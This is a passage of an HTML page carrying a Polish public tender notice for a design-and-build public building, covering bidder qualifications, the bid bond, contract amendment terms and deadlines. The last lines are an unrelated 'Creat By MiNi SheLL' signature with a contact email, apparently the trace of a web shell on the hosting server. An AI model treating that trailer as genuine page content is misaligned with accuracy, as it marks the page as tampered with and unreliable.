ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.4 zdolności technicznej lub zawodowej w zakresie:<br/>1)Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż <br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: <br/><br/>a) co najmniej jedno zamówienie, które - wykonano w formule ,,zaprojektuj i wybuduj”, <br/>- polegało na wykonaniu dokumentacji projektowej w zakresie niezbędnym do uzyskania pozwolenia na budowę oraz wykonaniu <br/>na jej podstawie robót budowlanych obejmujących budowę budynku (jako spełnienie warunku dopuszcza się także budynek wykonany w technologii modułowej) w zakres, którego wchodziło wykonanie minimum instalacji: wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacji mechanicznej i elektrycznej, w tym co najmniej jeden budynek o minimum dwóch kondygnacjach naziemnych <br/>- budowę budynku o charakterze dydaktycznym lub użyteczności publicznej <br/>lub<br/><br/>b1) co najmniej jedno zamówienie, polegające na wykonaniu dokumentacji projektowej w zakresie niezbędnym do uzyskania pozwolenia na budowę na realizację inwestycji obejmującej budowę budynku o charakterze dydaktycznym lub użyteczności publicznej (jako spełnienie warunku dopuszcza się także budynek wykonany w technologii modułowej) o minimum dwóch kondygnacjach nadziemnych w zakres, którego wchodziło zaprojektowanie minimum instalacji: wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacji mechanicznej, elektrycznej i zaprojektowanie zastosowania minimum jednego odnawialnego źródła energii,<br/>oraz<br/>b2) co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych obejmujących budowę budynku o charakterze dydaktycznym lub użyteczności publicznej (jako spełnienie warunku dopuszcza się także budynek wykonany w technologii modułowej) w zakres, którego wchodziło wykonanie minimum instalacji: wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacji mechanicznej, elektrycznej i minimum jednego odnawialnego źródła energii,<br/>	Na potwierdzenie wykaz oraz dowody - wg § 9 ust. 1 pkt. 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy<br/><br/><br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji: <br/>a) w zakresie projektowania:<br/>-min. jedną osobę, która będzie pełniła funkcję projektanta, a także głównego projektanta budowy/projektanta koordynującego, wg ustawy Prawo budowlane i posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej, których zakres uprawnia ją do projektowania obiektu budowlanego i robót objętych przedmiotem zamówienia, która w okresie ostatnich 5 lat przed terminem składania ofert pełniła w specjalności architektonicznej funkcję projektanta w rozumieniu przepisów ustawy Prawo budowlane przy opracowaniu minimum jednego projektu budowlanego obejmującego budowę budynku o charakterze dydaktycznym lub użyteczności publicznej o minimum dwóch kondygnacjach nadziemnych,<br/>- min. jedną osobę, która będzie pełniła funkcję projektanta w rozumieniu ustawy Prawo budowlane i posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej, których zakres uprawnia go do projektowania obiektu budowlanego i robót objętych przedmiotem zamówienia, która w okresie ostatnich 5 lat przed terminem składania ofert pełniła w specjalności konstrukcyjno-budowlanej funkcję projektanta w rozumieniu przepisów ustawy Prawo budowlane przy opracowaniu minimum jednego projektu budowlanego obejmującego budowę budynku o charakterze dydaktycznym lub użyteczności publicznej i minimum dwóch kondygnacjach nadziemnych,<br/>min. jedną osobę, która będzie pełniła funkcję projektanta w branży drogowej posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej, których zakres uprawnia ją do projektowania obiektu budowlanego i robót objętych przedmiotem zamówienia, <br/>min. jedną osobę, która będzie pełniła funkcję projektanta w branży sanitarnej posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, których zakres uprawnia ją do projektowania obiektu budowlanego i robót objętych przedmiotem zamówienia, <br/>min. jedną osobę, która będzie pełniła funkcję projektanta w branży elektrycznej posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, których zakres uprawnia ją do projektowania obiektu budowlanego i robót objętych przedmiotem zamówienia,<br/><br/><br/>Dopuszcza się spełnianie powyższego w pełnym lub częściowym zakresie przez tę samą osobę.<br/>Zamawiający dopuszcza wykazanie tej samej osoby projektanta do pełnienia więcej niż funkcji wskazanej w tiret 1-5 powyżej, o ile dana osoba posiada wymagane uprawienia i doświadczenie.<br/>b) w zakresie wykonywania robót:<br/><br/>min. jedną osobę, która będzie pełniła funkcję kierownika budowy w rozumieniu ustawy Prawo budowlane i posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, których zakres uprawnia ją do kierowania robotami objętymi przedmiotem zamówienia, która w ciągu ostatnich 5 lat przed upływem terminu składania ofert minimum raz pełniła w specjalności konstrukcyjno-budowlanej funkcję kierownika budowy przy realizacji robót budowlanych obejmujących budowę budynku o charakterze dydaktycznym lub użyteczności publicznej i minimum dwóch kondygnacjach nadziemnych,<br/>min. jedną osobę, która będzie pełniła funkcję kierownika robót w branży drogowej i posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej, których zakres uprawnia ją do kierowania robotami objętymi przedmiotem zamówienia, <br/>min. jedną osobę, która będzie pełniła funkcję kierownika robót w branży sanitarnej i posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, których zakres uprawnia ją do kierowania robotami objętymi przedmiotem zamówienia, <br/>min. jedną osobę, która będzie pełniła funkcję kierownika robót w branży elektrycznej i posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia.<br/><br/><br/>Dopuszcza się spełnianie powyższego w pełnym lub częściowym zakresie przez tę samą osobę.<br/>Zamawiający dopuszcza wykazanie tej samej osoby kierownika do pełnienia więcej niż funkcji wskazanej w tiret 1-4 powyżej, o ile dana osoba posiada wymagane uprawienia i doświadczenie.<br/><br/>Na potwierdzenie wykaz osób wraz z informacjami - wg § 9 ust. 1 pkt. 3 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.1. W<br/> celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/> a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres<br/> prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/> podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 6 do SWZ), oraz załączeniem<br/> dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/> bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z<br/> przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów - inne odpowiednie dokumenty w odniesieniu do warunku<br/> określonego w pkt. 6.1.4. ppkt. 1) SWZ,<br/> b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/> świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/> zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/> wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z<br/> Załącznikiem Nr 7 do SWZ - w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2) SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 100 000,00 PLN (słownie zł: sto tysięcy zł 00/100).<br/> 12.2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/> a) pieniądzu;<br/> b) gwarancjach bankowych;<br/> c) gwarancjach ubezpieczeniowych;<br/> d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/> utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/> 12.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: numer rachunku: 63 1560 0013 2000 1462 1000 0016<br/> z adnotacją „Wadium – Numer referencyjny: ZP.272.17.2025”.<br/> 12.4. Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku<br/> bankowym Zamawiającego przed upływem terminu składania ofert.<br/> 12.5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje zamawiającemu oryginał<br/> gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/> 12.6. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub<br/> poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone<br/> zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/> a) nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji /poręczenia (Zamawiającego), gwaranta lub poręczyciela<br/> oraz wskazanie ich siedzib,<br/> b) kwotę wadium,<br/> c) termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/> d) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu na pierwsze żądanie<br/> Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy Pzp.<br/> 12.7. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/> ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/> 12.8. Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/> pełnomocnika do reprezentowania<br/> ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/> zamówienia publicznego.<br/> 10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/> a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/> z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/> te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/> wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenie należy złożyć wg wymogów załącznika<br/> nr 4 do SWZ.<br/> b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/> dołączają do oferty oświadczenie,<br/> z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. W przypadku gdy ofertę<br/> składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno<br/> potwierdzać ten fakt. Oświadczenie należy złożyć wg wymogów załącznika nr 5 do SWZ.<br/> c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ,<br/> przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy,<br/> który/którzy wykazuje/-ą spełnienie warunku.<br/> 10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/> żądać przed zawarciem umowy<br/> w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy Pzp, strony dopuszczają możliwość wprowadzania zmiany<br/> umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia<br/> którejkolwiek z następujących okoliczności:<br/> 1) Przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1 umowy może nastąpić, z zastrzeżeniem § 18 ust.<br/> 2, w przypadku:<br/> a) wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne,<br/> niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski<br/> żywiołowe, strajki oraz akty władzy i administracji publicznej; - o liczbę dni, odpowiadającą okresowi występowania<br/> okoliczności siły wyższej uniemożliwiającej wykonanie zamówienia w terminie umownym;<br/> b) zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w Programie Funkcjonalno <br/>Użytkowym, aby zapewnić zgodność przedmiotu umowy z tymi przepisami; - o liczbę dni niezbędną Wykonawcy do<br/> wprowadzenia modyfikacji;<br/> c) zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają; - o czas niezbędny do uzyskania tych dokumentów, z uwzględnieniem terminów przewidzianych prawem oraz wewnętrznymi aktami<br/> organizacyjnymi podmiotów uprawnionych do ich wydania;<br/> d) gdy właściwe organy administracji publicznej i instytucje nie wydały wymaganych do wykonania świadczenia decyzji<br/> administracyjnych lub uzgodnień lub opinii w ustawowym terminie (a jeśli nie wyznaczono terminu ustawowego - w terminie<br/> zwyczajowo przyjętym na ich wydanie); - o czas występującego opóźnienia;<br/> e) oczekiwania na konieczne decyzje urzędowe i władz samorządowych, zmiany obowiązującego prawa, wyniki ekspertyz,<br/> wyroki sądowe itp. o ile oczekiwanie to nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność; - przy czym<br/> przedłużenie terminu wykonania zamówienia nastąpi o liczbę dni, odpowiadającą okresowi oczekiwania;<br/> f) konieczności dokonania korekt, zmian, poprawek w PFU w zakresie wynikającym ze zmiany opisu przedmiotu<br/> zamówienia na skutek błędów w opisie przedmiotu zamówienia lub zmiany opisu przedmiotu zamówienia na skutek<br/> okoliczności niezależnych od stron w szczególności związanych z czynnikiem społecznym, zmianą przepisów lub zmianą<br/> stanowiska instytucji uzgadniających (opiniujących); - o czas potrzebny na dokonanie korekt, zmian, poprawek w PFU;<br/> g) w przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania wykonywania etapu<br/> projektowania; - o czas, przez który Zamawiający pisemnie wstrzymał Wykonawcy wykonywanie zadania;<br/> h) w przypadku zmian zakresu świadczenia dokonanych na podstawie art. 455 ust. 1 pkt 3) lub 4) lub ust. 2 ustawy Prawo<br/> zamówień publicznych; - o czas niezbędny do wykonania dodatkowych czynności, jeżeli czynności tych Wykonawca nie<br/> mógł zrealizować w pierwotnym terminie wykonania umowy.<br/> i) wystąpienia niekorzystnych warunków atmosferycznych powodujących - ze względów technologicznych - wstrzymanie lub<br/> przerwanie całości wykonywanych robót budowlanych, na zewnątrz budynku, stanowiących przedmiot zamówienia w<br/> okresie dłuższym niż 3 następujące po sobie dni kalendarzowe – potwierdzonego pisemnie przez inspektora nadzoru; - przy<br/> czym przedłużenie terminu realizacji zamówienia nastąpi o tyle dni, przez ile trwało ich wstrzymanie lub przerwanie;<br/> j) skierowania przez zamawiającego do wykonawcy pisemnego żądania wstrzymania lub przerwania całości robót<br/> budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia całości robót budowlanych,<br/> stanowiących przedmiot zamówienia przez organ administracji publicznej lub eksploatorów infrastruktury, o ile żądanie lub<br/> wydanie zakazu nie nastąpiło z przyczyn, za które wykonawca ponosi odpowiedzialność; - przy czym przedłużenie terminu<br/> ....<br/> W związku z ograniczeniem liczby pól pełen zakres zmian w Załączniku nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">t: Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-24 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane 7 ustawy z dnia 13 kwietnia 2022 r. o<br/> szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t. j. Dz. U. 2024 r., poz. 507 z późn. zm.)

Creat By MiNi SheLL
Email: jattceo@gmail.com